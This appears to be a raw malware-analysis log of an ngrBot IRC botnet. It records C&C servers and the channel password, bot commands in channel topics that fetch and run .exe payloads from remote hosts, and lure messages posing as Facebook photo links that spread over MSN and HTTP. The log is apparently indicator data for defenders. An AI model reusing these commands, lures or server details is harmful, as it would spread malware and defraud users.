Resolved : [update.jebac.net] To [212.7.214.129]
Resolved : [update.jebac.net] To [212.7.203.231]
update.jebac.net 212.7.214.129
api.wipmania.com
api.wipmania.com 199.15.234.7
data.fuskbugg.se
data.fuskbugg.se 83.233.33.6
Download URLs
http://199.15.234.7/ (api.wipmania.com)
http://83.233.33.6/skalman02/4e28ae2064f07_av.txt (data.fuskbugg.se)
C&C Server: 212.7.214.129:1866
Server Password:
Username: jbxznyp
Nickname: n{DE|XPa}jbxznyp
Channel: #!hot! (Password: ngrBot)
Channeltopic: :.http.int 3 .msn.int 2 .http.set omfg!!# LOL!#!* http://www.designthreadz.com/facebook-pic-#####-JPEG .msn.set lolol*!!# foto?!# http://www.designthreadz.com/facebook-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n
Outgoing connection to remote server: api.wipmania.com TCP port 80
Outgoing connection to remote server: data.fuskbugg.se TCP port 80
Remote Host Port Number
199.15.234.7 80
83.233.33.6 80
212.7.203.243 1866 PASS ngrBot
212.7.203.231 1866 PASS ngrBot
212.7.214.129 1866 PASS ngrBot
NICK n{US|XPa}egzqkzh
USER egzqkzh 0 0 :egzqkzh
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s)
PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s)
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to “wowwwwwwwwvhswww you look so cute SEXYYY!! http://www.prisonofficer.org/album.php?=facebook-pic-81819-JPEG”
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to “LOL!! is this u? http://www.prisonofficer.org/album.php?=facebook-pic-29263-JPEG”
NICK n{US|XPa}mikkktb
USER mikkktb 0 0 :mikkktb
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “5”
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to “wowwwwwwwwdmiwww you look so cute baby!! http://www.prisonofficer.org/album.php?=facebook-pic-53153-JPG”
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “4”
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to “LOL http://www.prisonofficer.org/album.php?=facebook-pic-74848-JPG”
UPDATE:
Server: 212.7.203.231:1866
Server Password:
Username: kehrmdc
Nickname: n{DE|XPa}kehrmdc
Channel: #!hot! (Password: ngrBot)
Channeltopic: :.http.int 3 .msn.int 2 .http.set omfg!!# i luv your pic!#!* http://littleguyblog.com/facebook-pic-#####-JPEG .msn.set lolol*!!# foto?!# http://littleguyblog.com/facebook-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n
update.jebac.net 1866 PASS ngrBot
Resolved : [update.jebac.net] To [212.7.214.39]
Remote Host Port Number
195.122.131.9 80
212.7.214.16 80
213.251.170.52 80
212.7.214.39 1866 PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1269 domain(s) – Redirected 0 domain(s)
PRIVMSG #!hot! :[d=”http://rapidshare.com/files/3581947473/jamesbond.exe”] Error downloading file [e=”12039″]
NICK n{US|XPa}gshmhma
USER gshmhma 0 0 :gshmhma
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “5”
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to “oh you gotta see this lol http://www.baitbook.net/facebook-profile-pic-9292-JPEG”
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “5”
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to “LOL http://www.baitbook.net/facebook-profile-pic-1531-JPEG”
Channel: #!hot! (Password: ngrBot)
Channeltopic: :.http.int 6 .http.set did you see this? OMG!! http://just-zone.net/facebook-profile-pic-#####-JPEG .msn.int 4 .msn.set LOL http://just-zone.net/facebook-profile-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e03f517d1721_av.txt .dl http://rapidshare.com/files/910886759/news.exe -n
UPDATE:
Now talking in #!hot!
Topic On: [ #!hot! ] [ .http.int 5 .http.set wowwwww!!! HAHAHA http://www.photoenergy.net/facebook-profile-pic-#####-JPEG .msn.int 4 .msn.set LOL http://www.photoenergy.net/facebook-profile-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e17254a578b1_av.txt -n ]
Topic By: [ qwerty ]
* The data identified by the following URLs was then requested from the remote web server:
o http://rapidshare.com/files/3581947473/jamesbond.exe
o http://212.7.214.16/list.txt
UPDATE:
Server: 212.7.214.129:1866
Server Password:
Username: wvltyel
Nickname: n{DE|XPa}wvltyel
Channel: #!hot! (Password: ngrBot)
Channeltopic: :.http.int 3 .msn.int 2 .http.set wowwwwww!!# LOL!!#!* http://discoverhays.com/facebook-pic-#####-JPEG .msn.set lolol*!!# foto?!# http://discoverhays.com/facebook-pic-#####-JPEG .mdns http://data.fuskbugg.se/skalman02/4e28ae2064f07_av.txt -n
exe file used to spread:
http://320a5275.yyv.co
UPDATE:
Remote Host Port Number
199.15.234.7 80
212.7.203.231 1866 PASS secret..
NICK n{US|XPa}thqkaoo
USER thqkaoo 0 0 :thqkaoo
JOIN #!x! secret
PRIVMSG #!x! :[MSN]: Updated MSN spread interval to “3”
PRIVMSG #!x! :[MSN]: Updated MSN spread message to “:) hahahaxhahahfa! http://www.facebook.lms515.tk/Pictures-9315374-JPEG”
PRIVMSG #!x! :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #!x! :[HTTP]: Updated HTTP spread message to “;) hehehe! http://www.facebook.lms515.tk/Pictures-8481829-JPEG”
hosting infos:
http://whois.domaintools.com/212.7.203.243